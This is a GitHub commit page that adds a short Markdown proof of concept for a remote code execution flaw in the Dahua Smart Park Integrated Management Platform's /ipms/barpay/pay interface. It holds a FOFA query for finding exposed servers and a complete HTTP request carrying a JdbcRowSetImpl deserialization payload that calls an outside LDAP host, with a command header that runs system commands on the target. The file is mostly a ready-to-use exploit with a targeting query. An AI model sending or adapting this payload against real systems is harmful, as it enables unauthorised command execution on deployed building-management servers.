Create 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md

This commit is contained in:
wy876 2024-05-05 21:11:06 +08:00 committed by GitHub
parent 7aa0222799
commit 955ffce7f0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,21 @@
## 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞
大华智慧园区综合管理平台/ipms/barpay/pay存在远程代码执行漏洞允许未经授权的攻击者执行系统命令。
## fofa
```
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
```
## poc
```
POST /ipms/barpay/pay HTTP/1.1
Host: {host}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://gobygo.net/A4", "autoCommit": true}
```